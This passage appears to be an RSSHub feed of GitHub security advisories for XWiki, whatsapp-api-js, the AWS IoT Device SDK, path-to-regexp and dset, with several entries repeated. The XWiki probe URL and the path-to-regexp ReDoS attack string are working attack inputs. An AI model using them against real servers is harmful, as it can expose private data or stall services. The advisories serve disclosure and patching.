<li><a href="https://github.com/eclipse/jetty.project/security/advisories/GHSA-pwh8-58vv-vw48">https://github.com/eclipse/jetty.project/security/advisories/GHSA-pwh8-58vv-vw48</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/9660">https://github.com/eclipse/jetty.project/pull/9660</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-41900">https://nvd.nist.gov/vuln/detail/CVE-2023-41900</a></li>
<li><a href="https://www.debian.org/security/2023/dsa-5507">https://www.debian.org/security/2023/dsa-5507</a></li>
<li><a href="https://security.netapp.com/advisory/ntap-20231110-0004">https://security.netapp.com/advisory/ntap-20231110-0004</a></li>
<li><a href="https://github.com/advisories/GHSA-pwh8-58vv-vw48">https://github.com/advisories/GHSA-pwh8-58vv-vw48</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pwh8-58vv-vw48</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pwh8-58vv-vw48</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.xwiki.platform:xwiki-platform-rest-server] XWiki Platform document history including authors of any page exposed to unauthorized actors</title>
<description><h3 id="impact">Impact</h3>
<p>The REST API exposes the history of any page in XWiki of which the attacker knows the name. The exposed information includes for each modification of the page the time of the modification, the version number, the author of the modification (both username and displayed name) and the version comment. This information is exposed regardless of the rights setup, and even when the wiki is configured to be fully private.</p>
<p>On a private wiki, this can be tested by accessing <code>/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history</code>, if this shows the history of the main page then the installation is vulnerable.</p>
<h3 id="patches">Patches</h3>
<p>This has been patched in XWiki 15.10.9 and XWiki 16.3.0RC1.</p>
<h3 id="workarounds">Workarounds</h3>
<p>There aren't any known workarounds apart from upgrading to a fixed version.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f">https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45591">https://nvd.nist.gov/vuln/detail/CVE-2024-45591</a></li>
<li><a href="https://github.com/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pvmm-55r5-g3mm</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.xwiki.platform:xwiki-platform-rest-server] XWiki Platform document history including authors of any page exposed to unauthorized actors</title>
<description><h3 id="impact">Impact</h3>
<p>The REST API exposes the history of any page in XWiki of which the attacker knows the name. The exposed information includes for each modification of the page the time of the modification, the version number, the author of the modification (both username and displayed name) and the version comment. This information is exposed regardless of the rights setup, and even when the wiki is configured to be fully private.</p>
<p>On a private wiki, this can be tested by accessing <code>/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history</code>, if this shows the history of the main page then the installation is vulnerable.</p>
<h3 id="patches">Patches</h3>
<p>This has been patched in XWiki 15.10.9 and XWiki 16.3.0RC1.</p>
<h3 id="workarounds">Workarounds</h3>
<p>There aren't any known workarounds apart from upgrading to a fixed version.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f">https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45591">https://nvd.nist.gov/vuln/detail/CVE-2024-45591</a></li>
<li><a href="https://github.com/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pvmm-55r5-g3mm</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</guid>
<author>GitHub</author>
</item>
</channel>
</rss>... |
http://localhost:1200/github-advisor/data/npm - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - npm</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/npm" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - npm - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:32:37 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[whatsapp-api-js] whatsapp-api-js fails to validate message's signature</title>
<description><h3 id="impact">Impact</h3>
<p>Incorrect Access Control, anyone using the post or verifyRequestSignature methods to handle messages is impacted.</p>
<h3 id="patches">Patches</h3>
<p>Patched in version 4.0.3.</p>
<h3 id="workarounds">Workarounds</h3>
<p>It's possible to check the payload validation using the WhatsAppAPI.verifyRequestSignature and expect false when the signature is valid.</p>
<pre><code class="language-ts">function doPost(payload, header_signature) {
if (whatsapp.verifyRequestSignature(payload.toString(), header_signature) {
throw 403;
}
// Now the payload is correctly verified
whatsapp.post(payload);
}
</code></pre>
<h3 id="references">References</h3>
<p><a href="https://github.com/Secreto31126/whatsapp-api-js/pull/371">https://github.com/Secreto31126/whatsapp-api-js/pull/371</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/Secreto31126/whatsapp-api-js/security/advisories/GHSA-mwhf-vhr5-7j23">https://github.com/Secreto31126/whatsapp-api-js/security/advisories/GHSA-mwhf-vhr5-7j23</a></li>
<li><a href="https://github.com/Secreto31126/whatsapp-api-js/pull/371">https://github.com/Secreto31126/whatsapp-api-js/pull/371</a></li>
<li><a href="https://github.com/Secreto31126/whatsapp-api-js/commit/56620c65126427496a94d176082fbd8393a95b6d">https://github.com/Secreto31126/whatsapp-api-js/commit/56620c65126427496a94d176082fbd8393a95b6d</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45607">https://nvd.nist.gov/vuln/detail/CVE-2024-45607</a></li>
<li><a href="https://github.com/advisories/GHSA-mwhf-vhr5-7j23">https://github.com/advisories/GHSA-mwhf-vhr5-7j23</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mwhf-vhr5-7j23</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mwhf-vhr5-7j23</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.3.3), Python (versions prior to 1.5.18), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.1) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on Windows. This issue has been addressed in aws-c-io submodule versions 0.9.13 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.3.3 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.5.18 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Microsoft Windows.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40828">https://nvd.nist.gov/vuln/detail/CVE-2021-40828</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-94jq-q5v2-76wj">https://github.com/advisories/GHSA-94jq-q5v2-76wj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-94jq-q5v2-76wj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-94jq-q5v2-76wj</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on Unix systems. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The 'aws_tls_ctx_options_override_default_trust_store_*' function within the aws-c-io submodule has been updated to override the default trust store. This corrects this issue. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Linux/Unix. Amazon Web Services AWS-C-IO 0.10.4 on Linux/Unix.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40830">https://nvd.nist.gov/vuln/detail/CVE-2021-40830</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-c4rh-4376-gff4">https://github.com/advisories/GHSA-c4rh-4376-gff4</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-c4rh-4376-gff4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-c4rh-4376-gff4</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on macOS systems. Additionally, SNI validation is also not enabled when the CA has been "overridden". TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The <code>aws_tls_ctx_options_override_default_trust_store_*</code> function within the aws-c-io submodule has been updated to address this behavior. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.7.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.14.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.6.0 on macOS. Amazon Web Services AWS-C-IO 0.10.7 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40831">https://nvd.nist.gov/vuln/detail/CVE-2021-40831</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-j3f7-7rmc-6wqj">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.4.2), Python (versions prior to 1.6.1), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.3) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on MacOS. This issue has been addressed in aws-c-io submodule versions 0.10.5 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.4.2 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on macOS. Amazon Web Services AWS-C-IO 0.10.4 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40829">https://nvd.nist.gov/vuln/detail/CVE-2021-40829</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2">https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-743r-5g92-5vgf">https://github.com/advisories/GHSA-743r-5g92-5vgf</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-743r-5g92-5vgf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-743r-5g92-5vgf</guid>
<author>GitHub</author>
</item>
<item>
<title>[path-to-regexp] path-to-regexp outputs backtracking regular expressions</title>
<description><h3 id="impact">Impact</h3>
<p>A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (<code>.</code>). For example, <code>/:a-:b</code>.</p>
<h3 id="patches">Patches</h3>
<p>For users of 0.1, upgrade to <code>0.1.10</code>. All other users should upgrade to <code>8.0.0</code>.</p>
<p>These versions add backtrack protection when a custom regex pattern is not provided:</p>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10">0.1.10</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0">1.9.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0">3.3.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">6.3.0</a></li>
</ul>
<p>They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0">7.1.0</a> can enable <code>strict: true</code> and get an error when the regular expression might be bad.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0">8.0.0</a> removes the features that can cause a ReDoS.</p>
<h3 id="workarounds">Workarounds</h3>
<p>All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change <code>/:a-:b</code> to <code>/:a-:b([^-/]+)</code>.</p>
<p>If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.</p>
<h3 id="details">Details</h3>
<p>Using <code>/:a-:b</code> will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>. This can be exploited by a path such as <code>/a${'-a'.repeat(8_000)}/a</code>. <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a> has a good example of why this occurs, but the TL;DR is the <code>/a</code> at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the <code>:a-:b</code> on the repeated 8,000 <code>-a</code>.</p>
<p>Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a></li>
<li><a href="https://blakeembrey.com/posts/2024-09-web-redos/">Detailed blog post</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j">https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f">https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6">https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45296">https://nvd.nist.gov/vuln/detail/CVE-2024-45296</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485">https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef">https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894">https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0</a></li>
<li><a href="https://github.com/advisories/GHSA-9wv6-86v2-598j">https://github.com/advisories/GHSA-9wv6-86v2-598j</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9wv6-86v2-598j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9wv6-86v2-598j</guid>
<author>GitHub</author>
</item>
<item>
<title>[path-to-regexp] path-to-regexp outputs backtracking regular expressions</title>
<description><h3 id="impact">Impact</h3>
<p>A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (<code>.</code>). For example, <code>/:a-:b</code>.</p>
<h3 id="patches">Patches</h3>
<p>For users of 0.1, upgrade to <code>0.1.10</code>. All other users should upgrade to <code>8.0.0</code>.</p>
<p>These versions add backtrack protection when a custom regex pattern is not provided:</p>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10">0.1.10</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0">1.9.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0">3.3.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">6.3.0</a></li>
</ul>
<p>They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0">7.1.0</a> can enable <code>strict: true</code> and get an error when the regular expression might be bad.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0">8.0.0</a> removes the features that can cause a ReDoS.</p>
<h3 id="workarounds">Workarounds</h3>
<p>All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change <code>/:a-:b</code> to <code>/:a-:b([^-/]+)</code>.</p>
<p>If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.</p>
<h3 id="details">Details</h3>
<p>Using <code>/:a-:b</code> will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>. This can be exploited by a path such as <code>/a${'-a'.repeat(8_000)}/a</code>. <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a> has a good example of why this occurs, but the TL;DR is the <code>/a</code> at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the <code>:a-:b</code> on the repeated 8,000 <code>-a</code>.</p>
<p>Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a></li>
<li><a href="https://blakeembrey.com/posts/2024-09-web-redos/">Detailed blog post</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j">https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f">https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6">https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45296">https://nvd.nist.gov/vuln/detail/CVE-2024-45296</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485">https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef">https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894">https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0</a></li>
<li><a href="https://github.com/advisories/GHSA-9wv6-86v2-598j">https://github.com/advisories/GHSA-9wv6-86v2-598j</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9wv6-86v2-598j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9wv6-86v2-598j</guid>
<author>GitHub</author>
</item>
<item>
<title>[dset] dset Prototype Pollution vulnerability</title>
<description><p>Versions of the package dset before 3.1.4 are vulnerable to Prototype Pollution via the dset function due improper user input sanitization. This vulnerability allows the attacker to inject malicious object property using the built-in Object property <strong>proto</strong>, which is recursively assigned to all the objects in the program.</p>
